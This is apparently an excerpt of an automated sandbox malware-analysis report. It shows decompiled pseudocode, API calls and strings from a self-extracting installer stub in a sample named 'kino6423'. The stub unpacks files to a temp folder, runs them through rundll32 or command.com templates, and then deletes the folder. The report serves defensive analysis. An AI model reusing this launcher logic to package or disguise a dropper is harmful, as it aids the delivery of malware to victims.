Part of subcall function 00E5468F: LoadResource.KERNEL32(00000000,00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546CC
Part of subcall function 00E5468F: LockResource.KERNEL32(00000000,?,00E52D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546D3
Part of subcall function 00E5468F: memcpy_s.MSVCRT ref: 00E546E5
Part of subcall function 00E5468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E546EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00E58C42), ref: 00E53D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00E53E26
FreeLibrary.KERNEL32(00000000,?,00E58C42), ref: 00E53EFF
LocalFree.KERNEL32(?,?,?,?,00E58C42), ref: 00E53F1F
FreeLibrary.KERNEL32(00000000,?,00E58C42), ref: 00E53F40
LocalFree.KERNEL32(?,?,?,?,00E58C42), ref: 00E53F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00E58C42), ref: 00E53F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00E58C42), ref: 00E53F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00E58C42), ref: 00E53FC2

Strings

advpack.dll, xrefs: 00E53F9D
D, xrefs: 00E53C19
SHOWWINDOW, xrefs: 00E53C34
USRQCMD, xrefs: 00E53CAD
ADMQCMD, xrefs: 00E53C9E
REBOOT, xrefs: 00E53BE2
POSTRUNPROGRAM, xrefs: 00E53D60
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E53E74
<None>, xrefs: 00E53CC9, 00E53D7D
DoInfInstall, xrefs: 00E53E1F, 00E53E24, 00E53F68
RUNPROGRAM, xrefs: 00E53D05
doza2, xrefs: 00E53E68

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
API String ID: 1032054927-4103600427
Opcode ID: a726f4546cbfae856b269535de6cfcd79bab7c22416cdc5fd24cb4bd23ec9f4b
Instruction ID: e138b20257bbd988b2b22ca123b9a10232f827e0e697a1e3534b75cea674b06f
Opcode Fuzzy Hash: a726f4546cbfae856b269535de6cfcd79bab7c22416cdc5fd24cb4bd23ec9f4b
Instruction Fuzzy Hash: 7DB1D3706043019FD7249F358945BAAB7F4AB8478BF102D29FE85F21E1DB70894CCB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E51AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00E51AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xe58004; // 0x5ba1a886
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00E51680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00E51A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00E51781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
					E00E5658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00E51680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00E566C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00E566C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00E51680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00E51781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00E516B3( &_v1552, 0x400, " ");
										E00E516B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00E52AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00E5171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00E51A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00E51A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00E544B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xe59120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xe51140, _t156, 8,  &_v268) == 0) {
										 *0xe59a34 =  *0xe59a34 & 0xfffffffb;
										if( *0xe59a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E00E5171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xe59a34 =  *0xe59a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00E51680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00E51680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00E56CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00e51af3
0x00e51afa
0x00e51b07
0x00e51b09
0x00e51b1a
0x00e51b20
0x00e51b2c
0x00e51b3b
0x00e51b40
0x00e51b2e
0x00e51b2e
0x00e51b33
0x00e51b33
0x00e51b46
0x00e51b4c
0x00e51b52
0x00e51b57
0x00e51b5d
0x00e51b61
0x00e51b9f
0x00e51b9f
0x00e51bb1
0x00e51bc2
0x00000000
0x00e51b63
0x00e51b63
0x00e51b65
0x00e51b68
0x00e51b68
0x00e51b6a
0x00e51b6b
0x00e51b6f
0x00e51b74
0x00000000
0x00000000
0x00e51b76
0x00e51b7b
0x00e51b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00e51b8c
0x00e51b8c
0x00e51b98
0x00e51bc7
0x00e51bc9
0x00e51bcc
0x00e51bd3
0x00e51d75
0x00e51d76
0x00e51d78
0x00e51d7f
0x00e51e05
0x00e51e09
0x00000000
0x00000000
0x00e51e12
0x00e51e1b
0x00e51e73
0x00e51e21
0x00e51e21
0x00e51e28
0x00e51e37
0x00e51e3e
0x00e51e52
0x00e51e60
0x00e51e60
0x00e51e3e
0x00e51e79
0x00e51e7b
0x00e51e84
0x00000000
0x00e51d9b
0x00e51d9b
0x00e51da0
0x00e51da2
0x00e51da5
0x00e51da5
0x00e51da7
0x00e51da8
0x00e51dac
0x00e51dae
0x00e51db4
0x00e51db7
0x00e51db7
0x00e51db9
0x00e51dba
0x00e51dbe
0x00e51dc3
0x00e51dce
0x00e51dd2
0x00e51deb
0x00000000
0x00e51df0
0x00000000
0x00e51dd2
0x00e51bf7
0x00e51bfe
0x00e51c07
0x00e51d55
0x00e51d5a
0x00e51d5b
0x00e51d5d
0x00e51d5e
0x00000000
0x00e51c1b
0x00e51c1b
0x00e51c20
0x00e51c2c
0x00e51c33
0x00e51c38
0x00e51c3a
0x00e51c3a
0x00e51c40
0x00e51c4b
0x00e51c4b
0x00e51c5d
0x00e51c61
0x00e51dd4
0x00e51dd4
0x00e51dd6
0x00e51ddb
0x00e51ddc
0x00e51dde
0x00e51d64
0x00e51d64
0x00e51d67
0x00e51d6c
0x00000000
0x00e51c67
0x00e51c67
0x00e51c6d
0x00e51c72
0x00e51c74
0x00e51c74
0x00e51c8e
0x00e51c99
0x00e51cc0
0x00e51cf8
0x00e51d07
0x00e51d23
0x00e51d09
0x00e51d14
0x00e51d1b
0x00e51d1b
0x00e51d2b
0x00e51d2d
0x00e51d2d
0x00e51d38
0x00e51d39
0x00e51d46
0x00e51cc2
0x00e51cc2
0x00e51ccc
0x00e51cce
0x00e51cce
0x00e51cdb
0x00e51ce6
0x00e51cee
0x00e51cee
0x00e51e89
0x00e51e91
0x00e51e92
0x00e51e94
0x00e51e97
0x00e51ea4
0x00e51ea4
0x00e51c61
0x00e51c07
0x00e51bd3
0x00e51b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00E51BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00E51BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00E51C57
GetPrivateProfileIntA.KERNEL32 ref: 00E51C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00E51140,00000000,00000008,?), ref: 00E51CB8
GetShortPathNameA.KERNEL32 ref: 00E51D1B

Part of subcall function 00E544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E54518
Part of subcall function 00E544B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00E54554

Strings

AdvancedINF, xrefs: 00E51CAE
Command.com /c %s, xrefs: 00E51D9B, 00E51DE8
DefaultInstall, xrefs: 00E51C74, 00E51C87, 00E51CCE, 00E51CD3, 00E51D2D, 00E51D39
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00E51D3B
setupapi.dll, xrefs: 00E51D23, 00E51D3A
Version, xrefs: 00E51CB3
", xrefs: 00E51B25
.BAT, xrefs: 00E51D83
Reboot, xrefs: 00E51C82
setupx.dll, xrefs: 00E51D14
.INF, xrefs: 00E51BDB
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E51BA0

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-2112662285
Opcode ID: 0b615c1efb5859c953653a99fc68fe4b840c8f6da95e9eaae9f648510e7f35dd
Instruction ID: a1d5311e8609663a35c98dc1ed5a179ec493c04fc20cb3eb217b1c700c4b2f61
Opcode Fuzzy Hash: 0b615c1efb5859c953653a99fc68fe4b840c8f6da95e9eaae9f648510e7f35dd
Instruction Fuzzy Hash: EEA13970A00318ABEB249B24CC45FEA77A99B85317F142ED5ED55B32C1DBB09D8DCB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E52F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00E52F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0xe58004; // 0x5ba1a886
				_v8 = _t9 ^ _t46;
				if( *0xe58a38 != 0) {
					L5:
					_t11 = E00E55164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00E56CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E00E555A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E00E5658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0xe5a288("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0xe58a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0xe58a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0xe58d48 & 0x000000c0;
									if(( *0xe58d48 & 0x000000c0) == 0) {
										_t41 =  *0xe59a40; // 0x3, executed
										_t26 = E00E5256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0xe58a24; // 0x0
									 *0xe59a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0xe58a38;
										if( *0xe58a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00E54169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0xe59a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00E53BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0xe58a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00E53B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E00E544B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0xe59124 = E00E56285();
							goto L16;
						}
						_t59 =  *0xe59a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E00E5621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0xe58a24;
				if( *0xe58a24 != 0) {
					L4:
					_t34 = E00E53A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E00E551E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0xe58a38;
				if( *0xe58a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00e52f1d
0x00e52f28
0x00e52f2f
0x00e52f3d
0x00e52f6c
0x00e52f6c
0x00e52f71
0x00e52f73
0x00e53041
0x00e53041
0x00e53043
0x00e53053
0x00e53053
0x00e52f79
0x00e52f80
0x00000000
0x00e52f86
0x00e52f86
0x00e52f93
0x00e52f9e
0x00e52fa0
0x00e52fa6
0x00e52fb8
0x00e52fba
0x00e52fbe
0x00e52fc6
0x00e52fcc
0x00e52fd4
0x00e52fd6
0x00e52fd8
0x00e52fe0
0x00e52fe6
0x00e52fee
0x00e52ff0
0x00e52ff5
0x00e52ff5
0x00e52fee
0x00e52fd4
0x00e52ff8
0x00e52ffe
0x00e53004
0x00e53017
0x00e5301c
0x00e53024
0x00e53054
0x00e5305a
0x00e53065
0x00e53065
0x00e5306c
0x00e5306e
0x00e53075
0x00e5307a
0x00e5307a
0x00e5307c
0x00e53081
0x00e53087
0x00e53089
0x00e530a1
0x00e530a1
0x00e530a9
0x00e530ab
0x00e530ad
0x00e530af
0x00e530af
0x00e530ad
0x00e530b6
0x00000000
0x00e5308b
0x00e5308b
0x00e53091
0x00000000
0x00000000
0x00e53093
0x00e53098
0x00e5309a
0x00000000
0x00000000
0x00e5309c
0x00000000
0x00e5309c
0x00e53089
0x00e5305c
0x00e53061
0x00e53063
0x00000000
0x00000000
0x00000000
0x00e53063
0x00e5302b
0x00e53032
0x00e5303c
0x00000000
0x00e5303c
0x00e53006
0x00e5300c
0x00000000
0x00000000
0x00e5300e
0x00e53015
0x00000000
0x00000000
0x00000000
0x00e53015
0x00e52f80
0x00e52f3f
0x00e52f46
0x00e52f5f
0x00e52f5f
0x00e52f64
0x00e52f66
0x00000000
0x00000000
0x00000000
0x00e52f66
0x00e52f4f
0x00000000
0x00000000
0x00e52f55
0x00e52f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00E52F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00E52FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00E52FC6
DecryptFileA.ADVAPI32 ref: 00E52FE6
FreeLibrary.KERNEL32(00000000), ref: 00E52FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00E5301C

Part of subcall function 00E551E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E52F4D,?,00000002,00000000), ref: 00E55201

Strings

DecryptFileA, xrefs: 00E52FC0
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E52FDB, 00E53017
advapi32.dll, xrefs: 00E52F99

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-1002207402
Opcode ID: 3e33dccf8a44c6afcbba022a5a257e75e0633ea3aa34444bf6f4a7853e74b914
Instruction ID: 60dc84f5428ed413804d9c780869a53c79134bc7232abb0e3c1705b5c0d489a4
Opcode Fuzzy Hash: 3e33dccf8a44c6afcbba022a5a257e75e0633ea3aa34444bf6f4a7853e74b914
Instruction Fuzzy Hash: A741EB316007058EDB78AB72AD4566637E89B5479BF002D69ED01F21D2EF74CE8CCA61

Uniqueness

Uniqueness Score: -1.00%

Function 00E52390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00E52390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0xe58004; // 0x5ba1a886
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00E56CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00E51680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E00E516B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00E51680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E00E516B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E00E516B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E00E5658A( &_v280, 0x104, 0xe51140);
								E00E52390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x00e52398
0x00e5239e
0x00e523a3
0x00e523a5
0x00e523ae
0x00e523b3
0x00e524cb
0x00e524d2
0x00e524d3
0x00e524d4
0x00e524df
0x00e523c2
0x00e523d1
0x00e523db
0x00e523e4
0x00e523f6
0x00e523fc
0x00e52401
0x00000000
0x00000000
0x00000000
0x00000000
0x00e52407
0x00e52407
0x00e52408
0x00e52411
0x00e5241f
0x00e5247a
0x00e52483
0x00e52495
0x00e524a3
0x00e52421
0x00e5242f
0x00e52453
0x00e5245d
0x00e52466
0x00e52472
0x00e52472
0x00e5242f
0x00e524af
0x00e524b5
0x00e524be
0x00e524c5
0x00000000
0x00e524c5

APIs

FindFirstFileA.KERNELBASE(?,00E58A3A,00E511F4,00E58A3A,00000000,?,?), ref: 00E523F6
lstrcmpA.KERNEL32(?,00E511F8), ref: 00E52427
lstrcmpA.KERNEL32(?,00E511FC), ref: 00E5243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00E52495
DeleteFileA.KERNEL32(?), ref: 00E524A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 00E524AF
FindClose.KERNELBASE(00000000), ref: 00E524BE
RemoveDirectoryA.KERNELBASE(00E58A3A), ref: 00E524C5

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 3c11890a2c9793a27060cadb8512c7b037e32cee09c06330ae1b20ba1bf35fbf
Instruction ID: 0551253eace26a49eeaaf818e65a9d405b943e721d07875d03a789164e135aa4
Opcode Fuzzy Hash: 3c11890a2c9793a27060cadb8512c7b037e32cee09c06330ae1b20ba1bf35fbf
Instruction Fuzzy Hash: A0318131204740AFC324DB64CD89AEF73ECABC5307F045D7DBA55A6190EB74990D8752

Uniqueness

Uniqueness Score: -1.00%

Function 00E52BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00E52BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0xe5a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0xe59124 = 0;
				if(E00E52CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00E52F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E00E552B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0xe58a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0xe59a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00E51F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0xe58588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xe59124; // 0x80070002
				return _t7;
			}

0x00e52c03
0x00e52c0d
0x00e52c18
0x00e52c20
0x00e52c2e
0x00e52c32
0x00e52c36
0x00e52c3d
0x00e52c43
0x00e52c45
0x00e52c47
0x00e52c49
0x00e52c4e
0x00e52c4e
0x00e52c47
0x00e52c32
0x00e52c20
0x00e52c50
0x00e52c54
0x00e52c57
0x00e52c64
0x00e52c66
0x00e52c6b
0x00e52c6d
0x00e52c74
0x00e52c76
0x00e52c7c
0x00e52c7e
0x00e52c87
0x00e52c89
0x00e52c89
0x00e52c87
0x00e52c7c
0x00e52c74
0x00e52c8e
0x00e52c95
0x00e52c98
0x00e52c98
0x00e52c9e
